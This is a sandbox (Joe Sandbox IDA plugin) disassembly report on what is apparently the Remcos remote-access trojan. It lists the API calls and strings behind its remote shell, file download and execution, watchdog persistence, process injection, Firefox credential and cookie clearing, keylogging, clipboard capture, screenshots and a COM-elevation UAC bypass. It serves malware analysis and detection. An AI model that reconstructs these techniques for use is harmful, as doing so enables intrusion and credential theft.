                                                  • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 004056E6
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • __Init_thread_footer.LIBCMT ref: 00405723
                                                  • CreatePipe.KERNEL32(00476CDC,00476CC4,00476BE8,00000000,004660CC,00000000), ref: 004057B6
                                                  • CreatePipe.KERNEL32(00476CC8,00476CE4,00476BE8,00000000), ref: 004057CC
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BF8,00476CCC), ref: 0040583F
                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474FA0,004660D0,00000062,004660B4), ref: 004059E4
                                                  • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                  • CloseHandle.KERNEL32 ref: 00405A23
                                                  • CloseHandle.KERNEL32 ref: 00405A2B
                                                  • CloseHandle.KERNEL32 ref: 00405A3D
                                                  • CloseHandle.KERNEL32 ref: 00405A45
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                  • String ID: @lG$@lG$@lG$@lG$@lG$SystemDrive$cmd.exe$kG$lG$lG$lG$lG
                                                  • API String ID: 2994406822-3565532687
                                                  • Opcode ID: 8d87da5d38b29fc02572c9c06590d9593467721d2a1815d24e92841f6c0e4b02
                                                  • Instruction ID: efba9956b6c01968ba48be3e84054341744464a70a9fb060b5e58b4ef4e39929
                                                  • Opcode Fuzzy Hash: 8d87da5d38b29fc02572c9c06590d9593467721d2a1815d24e92841f6c0e4b02
                                                  • Instruction Fuzzy Hash: ED91B271600604AFD711FB35AD41A6B3AAAEB84344F01443FF549A72E2DB7D9C488F6D
                                                  APIs
                                                  • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                  • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                    • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EF0,?), ref: 0041C37D
                                                    • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EF0,?), ref: 0041C3AD
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EF0,?), ref: 0041C402
                                                    • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C463
                                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EF0,?), ref: 0041C46A
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000), ref: 00404B47
                                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B60,00474EF0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004082B3
                                                  • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                  • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                    • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                    • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                    • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                    • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                  • Sleep.KERNEL32(000007D0), ref: 00408733
                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 00408775
                                                    • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                  • String ID: (aF$8PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$hPG$hPG$hPG$hPG$open
                                                  • API String ID: 1067849700-1785547828
                                                  • Opcode ID: a38126f5ac3d8242f30027f162745372128d1dbc857b7e17ab941b09cd7aea2d
                                                  • Instruction ID: d596b55e62c6dc406d7f5c06aadeacefb76b4acf2f669351df47ebe9cc805958
                                                  • Opcode Fuzzy Hash: a38126f5ac3d8242f30027f162745372128d1dbc857b7e17ab941b09cd7aea2d
                                                  • Instruction Fuzzy Hash: 9F4282716043016BC604FB76C9579AE77A9AF91348F80483FF582671E2EE7C9908C79B
                                                  APIs
                                                  • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412181
                                                  • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                  • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                  • String ID: (TG$HVP$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                  • API String ID: 3018269243-2771866476
                                                  • Opcode ID: 6d17834c98aafb32a04268e79b86f2327b633be7ad5aa5180c2644202ac067b2
                                                  • Instruction ID: 26abbb7e12f392f9fbc718c06b30ae47eaa1113e002934215aad22704783e961
                                                  • Opcode Fuzzy Hash: 6d17834c98aafb32a04268e79b86f2327b633be7ad5aa5180c2644202ac067b2
                                                  • Instruction Fuzzy Hash: 3C71A23160420167C604FB72CD579AE77A4AE94308F40097FF586A61E2FFBC9945C69E
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0Q,?,00475348), ref: 0040F4C9
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475348), ref: 0040F4F4
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475348), ref: 0040F59E
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • CloseHandle.KERNEL32(00000000,?,00475348), ref: 0040F6A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                  • String ID: 0Q$C:\Program Files(x86)\Internet Explorer\$HVP$Inj$ieinstal.exe$ielowutil.exe$xdF$xdF
                                                  • API String ID: 3756808967-2491953179
                                                  • Opcode ID: 725a3e6de7ee6396044f7f8f85f118b25c175df28f08d8365c1b7f4a29359465
                                                  • Instruction ID: f7ffc7f0dfbd756cb6275d6ec2ba0be94116b78c8c9f611e281f0170cc986b4a
                                                  • Opcode Fuzzy Hash: 725a3e6de7ee6396044f7f8f85f118b25c175df28f08d8365c1b7f4a29359465
                                                  • Instruction Fuzzy Hash: 4C7130705083419AC724FB21D8559AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                  • API String ID: 1164774033-3681987949
                                                  • Opcode ID: bf76c0761a2e7947129be52649456460016c820f53a51d00ddc1831a26fece0b
                                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                                  • Opcode Fuzzy Hash: bf76c0761a2e7947129be52649456460016c820f53a51d00ddc1831a26fece0b
                                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                                  APIs
                                                  • OpenClipboard.USER32 ref: 004168FD
                                                  • EmptyClipboard.USER32 ref: 0041690B
                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                                  • CloseClipboard.USER32 ref: 00416990
                                                  • OpenClipboard.USER32 ref: 00416997
                                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                  • CloseClipboard.USER32 ref: 004169BF
                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                  • String ID: !D@$xdF
                                                  • API String ID: 3520204547-3540039394
                                                  • Opcode ID: e749cddcce1f4619cc39aec9b3b0d21a3e12a1a333e96ce617c8456d3be18175
                                                  • Instruction ID: 40a69bedac3bd734cdfdd6227e623399476ab8ebe6f0a7c245c4ec6d1d06efb6
                                                  • Opcode Fuzzy Hash: e749cddcce1f4619cc39aec9b3b0d21a3e12a1a333e96ce617c8456d3be18175
                                                  • Instruction Fuzzy Hash: 16215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                                  APIs
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$Close$File$FirstNext
                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                  • API String ID: 3527384056-432212279
                                                  • Opcode ID: c36d1836a3e8665170897b6f304f4598f597cdea8fe02681caf218266ace6bef
                                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                                  • Opcode Fuzzy Hash: c36d1836a3e8665170897b6f304f4598f597cdea8fe02681caf218266ace6bef
                                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                                  APIs
                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                                  • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                                  • CloseHandle.KERNEL32(?), ref: 004134A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                  • String ID:
                                                  • API String ID: 297527592-0
                                                  • Opcode ID: c7440ca18a81b1cb078e1e05a75070588a5c97419a1628ae9022092e856eb863
                                                  • Instruction ID: cfdeae1586e3f17d3ae994cf28232467201964e06db1490d1c70a6fe2d897c90
                                                  • Opcode Fuzzy Hash: c7440ca18a81b1cb078e1e05a75070588a5c97419a1628ae9022092e856eb863
                                                  • Instruction Fuzzy Hash: A841F371104301BBD7109F26EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$1$2$3$4$5$6$7
                                                  • API String ID: 0-3177665633
                                                  • Opcode ID: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                                  • Instruction ID: 3c74f5afe55031bef20d6cb4aa2bc38f0c43463ce83be6e36937eb537edf8bdf
                                                  • Opcode Fuzzy Hash: bbb04b4e4ef4cf43d21947f6752686c6d5343f3de50f2534b72754370d573c82
                                                  • Instruction Fuzzy Hash: CB71E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                                  • GdiplusStartup.GDIPLUS(00474AE0,?,00000000), ref: 0041A07C
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                  • String ID: 0Q$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                  • API String ID: 489098229-1978171858
                                                  • Opcode ID: be275f748410e01fba0c7da1ed726453e64177bc4dfeb7a5236728b23af9d070
                                                  • Instruction ID: ac563f1b8c988fbcbdb25ffa0f060f034023d1de15a29d9718e9897573209577
                                                  • Opcode Fuzzy Hash: be275f748410e01fba0c7da1ed726453e64177bc4dfeb7a5236728b23af9d070
                                                  • Instruction Fuzzy Hash: 3F518E70A00215AACB14BBB5C8529FD77A9AF54308F40403FF509AB1E2EF7C4D85C799
                                                  APIs
                                                  • GetForegroundWindow.USER32 ref: 0040A451
                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                                  • GetKeyboardState.USER32(?), ref: 0040A479
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                  • String ID: (kG
                                                  • API String ID: 1888522110-2813241365
                                                  • Opcode ID: 31ed79bda99ad10420f5864c73503205d5e880a6a674e4152aa1d5376154a4ca
                                                  • Instruction ID: 3b9a32d10988b9101c987d3e8fcb44953e801c6634267c48ca941b3c69dca571
                                                  • Opcode Fuzzy Hash: 31ed79bda99ad10420f5864c73503205d5e880a6a674e4152aa1d5376154a4ca
                                                  • Instruction Fuzzy Hash: F8316D72504308BFD700DFA0DC45F9B7BECAB88754F00083AB645D61A0D7B5E948CBA6
                                                  APIs
                                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                  • String ID: !D@$$aF$(aF$,aF$PowrProf.dll$SetSuspendState
                                                  • API String ID: 1589313981-3345310279
                                                  • Opcode ID: 2ea36502faf7531acb831456c0fd6544e54f081cb360590b3235c964168b1c52
                                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                  • Opcode Fuzzy Hash: 2ea36502faf7531acb831456c0fd6544e54f081cb360590b3235c964168b1c52
                                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040755C
                                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Object_wcslen
                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                  • API String ID: 240030777-3166923314
